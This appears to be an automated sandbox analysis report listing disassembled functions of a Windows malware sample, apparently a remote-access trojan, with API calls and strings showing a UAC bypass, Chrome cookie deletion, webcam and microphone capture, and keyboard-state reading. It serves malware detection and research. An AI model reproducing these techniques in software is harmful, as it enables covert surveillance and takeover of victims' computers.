Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF

_wcslen.LIBCMT ref: 0041B763

Strings

program files (x86)\, xrefs: 0041B75D
http\shell\open\command, xrefs: 0041B69A
program files\, xrefs: 0041B749, 0041B750, 0041B762
.exe, xrefs: 0041B6B5
8SG, xrefs: 0041B709, 0041B70E

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
API String ID: 3286818993-122982132
Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269

Function 02131F72 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 02131FB7

Part of subcall function 02131CD4: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02131D40

waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 02132069
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 021320A7
waveInAddBuffer.WINMM(00472A88,00000020), ref: 021320B6

Strings

|MG, xrefs: 0213206F
dMG, xrefs: 02131FE8

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: dMG$|MG
API String ID: 3809562944-1683252805
Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
Instruction ID: 4487efd87df35f73edb72b074f53759838354721ad8f8d9bd31122a2b0792ece
Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
Instruction Fuzzy Hash: 26317E315543009FC326FF24DD54AAE77ABFB94310F404439A55E921A0EF709E49CFAA

Function 02186DBA Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
Instruction ID: 6468061fbd9da6d33c7f27b74b45f810817392790707a917bf6f77237e0958fc
Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
Instruction Fuzzy Hash: C311A272984254BFCB20BF76CC48A6B7ABDDFC5760B210669B815D6150DF35C800CEA0

Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8

Function 02181161 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02180EA8: _free.LIBCMT ref: 02180ED1

_free.LIBCMT ref: 021811AF

Part of subcall function 021769E9: HeapFree.KERNEL32(00000000,00000000,?,02180ED6,?,00000000,?,00000000,?,0218117A,?,00000007,?,?,021816C5,?), ref: 021769FF
Part of subcall function 021769E9: GetLastError.KERNEL32(?,?,02180ED6,?,00000000,?,00000000,?,0218117A,?,00000007,?,?,021816C5,?,?), ref: 02176A11

_free.LIBCMT ref: 021811BA
_free.LIBCMT ref: 021811C5
_free.LIBCMT ref: 02181219
_free.LIBCMT ref: 02181224
_free.LIBCMT ref: 0218122F
_free.LIBCMT ref: 0218123A

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction ID: ef0cc40b041d81346f471418dfa914e489f4ecfef5338e90a10f707f3a0c9c9c
Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
Instruction Fuzzy Hash: 4A117C735D0B08AED660BBB0DD86FCB77AEAF5C700F400C18A2D9A6050DB74F95A8E50

Function 021413CA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 021413D7
int.LIBCPMT ref: 021413EA

Part of subcall function 0213E328: std::_Lockit::_Lockit.LIBCPMT ref: 0213E339
Part of subcall function 0213E328: std::_Lockit::~_Lockit.LIBCPMT ref: 0213E353

std::_Facet_Register.LIBCPMT ref: 0214142A
std::_Lockit::~_Lockit.LIBCPMT ref: 02141433
__CxxThrowException@8.LIBVCRUNTIME ref: 02141451

Strings

(mG, xrefs: 021413E2

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: (mG
API String ID: 2536120697-4059303827
Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
Instruction ID: 59cfa2c85832c0be6c30f0e8622ccae4df5174beba086cf6132e77a6bc9daf78
Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
Instruction Fuzzy Hash: 63112C72640228BFC715EBA8D8049EE776BDF40354B55415AE90CE7290DF309E51CFD1

Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00411170
int.LIBCPMT ref: 00411183

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 004111C3
std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
__CxxThrowException@8.LIBVCRUNTIME ref: 004111EA

Strings

(mG, xrefs: 0041117B

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID: (mG
API String ID: 2536120697-4059303827
Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9

Function 0216A5C1 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0216A5B8,02169525), ref: 0216A5CF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0216A5DD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0216A5F6
SetLastError.KERNEL32(00000000,?,0216A5B8,02169525), ref: 0216A648

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction ID: b4db03b2e4565ec86cf91bedae02e3fa7ba5c57959650ab7de36dd9dece785d1
Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction Fuzzy Hash: 63014C332993516E962427787C9C67E365EEF417797200339E528505F0EF2348E185C4

Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D

Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

76C9D0D0.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\ltlbVjClX9.exe), ref: 004075D0

Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

76C9D120.OLE32 ref: 00407629

Strings

[+] before ShellExec, xrefs: 004075F1
[+] ucmCMLuaUtilShellExecMethod, xrefs: 004075B5
[+] ShellExec success, xrefs: 0040760E
C:\Users\user\Desktop\ltlbVjClX9.exe, xrefs: 004075B0, 004075B3, 00407605

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: D120Object_wcslen
String ID: C:\Users\user\Desktop\ltlbVjClX9.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
API String ID: 1981604283-1325254649
Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB

Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
GetLastError.KERNEL32 ref: 0040BAE7

Strings

\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
[Chrome Cookies found, cleared!], xrefs: 0040BB0D
[Chrome Cookies not found], xrefs: 0040BB01
UserProfile, xrefs: 0040BAAD

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 16d6f408b9675ea448cf88d23ae905d31fffe8c821138c1d41c666bfe2ed1154
Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
Opcode Fuzzy Hash: 16d6f408b9675ea448cf88d23ae905d31fffe8c821138c1d41c666bfe2ed1154
Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE

Function 0214D6C4 Relevance: 10.5, APIs: 7, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0214D6DD

Part of subcall function 0214D776: RegisterClassExA.USER32(00000030), ref: 0214D7C2
Part of subcall function 0214D776: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0214D7DD
Part of subcall function 0214D776: GetLastError.KERNEL32 ref: 0214D7E7

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0214D714
lstrcpyn.KERNEL32(00474B60,0046CF34,00000080), ref: 0214D72E
Shell_NotifyIcon.SHELL32(00000000,00474B48), ref: 0214D744
TranslateMessage.USER32(?), ref: 0214D750
DispatchMessageA.USER32(?), ref: 0214D75A
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0214D767

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID:
API String ID: 1970332568-0
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: c03519f0aaa1d1b7430e7d7d5a107710e2144c4831409f7b60c4d0dbd832bdbe
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: A3011271940249EBDB109FA5EC4CFAABB7CEB85706F004165F519930A1DBB8E845CB58

Function 021374C7 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON

Download Yara Rule

Strings

hdF, xrefs: 02137910
C:\Users\user\Desktop\ltlbVjClX9.exe, xrefs: 0213792B
Rmc-0ZPVF8, xrefs: 02137941

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\ltlbVjClX9.exe$Rmc-0ZPVF8$hdF
API String ID: 0-3262473091
Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
Instruction ID: faddc7dfd739f8bcb1471ce48f6fe67708e8c2768346567b41aa56f8d08b4ce7
Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
Instruction Fuzzy Hash: 41F024F07C0700EFDB163B206E186793647AB45752F4044B1FA4ADA1E1EB604C43CB58

Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390

Strings

mscoree.dll, xrefs: 00443353
PkGNG, xrefs: 0044333C
CorExitProcess, xrefs: 00443365

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$PkGNG$mscoree.dll
API String ID: 4061214504-213444651
Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98

Function 0216AD43 Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0216AED0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0216AEEC
__allrem.LIBCMT ref: 0216AF03
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0216AF21
__allrem.LIBCMT ref: 0216AF38
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0216AF56

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction ID: d1ef2424b63f93bcc62f8dc09194beea7a2d0e8ecbb76de80f362863079f7181
Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction Fuzzy Hash: C28119B2A807059FE724AA78CC44BBEB3B9AF40324F25457EE415E76C0EB71D9118F90

Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0043AC69
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
__allrem.LIBCMT ref: 0043AC9C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
__allrem.LIBCMT ref: 0043ACD1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A

Function 02173AA0 Relevance: 9.2, APIs: 6, Instructions: 217COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02173B30
_free.LIBCMT ref: 02173B4A
_free.LIBCMT ref: 02173B55
_free.LIBCMT ref: 02173C29
_free.LIBCMT ref: 02173C45

Part of subcall function 0216BF80: IsProcessorFeaturePresent.KERNEL32(00000017,0216BF52,?,?,?,?,?,00000000,?,?,0216BF72,00000000,00000000,00000000,00000000,00000000), ref: 0216BF82
Part of subcall function 0216BF80: GetCurrentProcess.KERNEL32(C0000417), ref: 0216BFA4
Part of subcall function 0216BF80: TerminateProcess.KERNEL32(00000000), ref: 0216BFAB

_free.LIBCMT ref: 02173C4F

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
String ID:
API String ID: 2329545287-0
Opcode ID: dd4679e497a3ac440a36ccf5cad4bc4b97665c585b91728a2df2259eb48d0105
Instruction ID: bdd677fa49d4929175b49ffe8f53887d543f6fb21d8fbdd71d9ed8503c50b9e6
Opcode Fuzzy Hash: dd4679e497a3ac440a36ccf5cad4bc4b97665c585b91728a2df2259eb48d0105
Instruction Fuzzy Hash: 7B51AE33584218AFDF28AF68D841BBAB7B9DFC5324F2440DEE814DB240EB329D42D650

Function 021345D8 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?), ref: 0213472B

Part of subcall function 0213486E: __EH_prolog.LIBCMT ref: 02134873

Strings

HNG, xrefs: 0213484D
OpenCamera, xrefs: 021347E9
FreeFrame, xrefs: 02134817
GetFrame, xrefs: 02134806
CloseCamera, xrefs: 021347F5

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 3469354165-3054508432
Opcode ID: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
Instruction ID: d107275775f33d642bf98ae2e9f4152e612f51492b783959adbafa013581e14b
Opcode Fuzzy Hash: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
Instruction Fuzzy Hash: 19512671A84210AFCA1BFB74CD54A6E3BA7AB81714F000468EC0997794EF749E45CB96

Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?), ref: 004044C4

Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C

Strings

GetFrame, xrefs: 0040459F
FreeFrame, xrefs: 004045B0
OpenCamera, xrefs: 00404582
HNG, xrefs: 004045E6
CloseCamera, xrefs: 0040458E

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 3469354165-3054508432
Opcode ID: 406d38901b8bfdeb8abd72dc397f41e9a7bdc85f3be320b1d56e90b6dae3c764
Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
Opcode Fuzzy Hash: 406d38901b8bfdeb8abd72dc397f41e9a7bdc85f3be320b1d56e90b6dae3c764
Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E

Function 02175B60 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 02175B8C
__cftoe.LIBCMT ref: 02175BBE

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
Instruction ID: 7cd6809f0e15886ce427b1d6de58e04b9bb877aeb3b3ebb33afcb5e17deb7048
Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
Instruction Fuzzy Hash: 4551D572984209BFDB249F68CC45FBE77BBEFC8374FA44119EC1596190EB31D9008A64

Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00445925
__cftoe.LIBCMT ref: 00445957

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C

Function 0213A647 Relevance: 9.1, APIs: 6, Instructions: 112keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0213A67D
GetWindowThreadProcessId.USER32(00000000,?), ref: 0213A689
GetKeyboardLayout.USER32(00000000), ref: 0213A690
GetKeyState.USER32(00000010), ref: 0213A69A
GetKeyboardState.USER32(?), ref: 0213A6A5
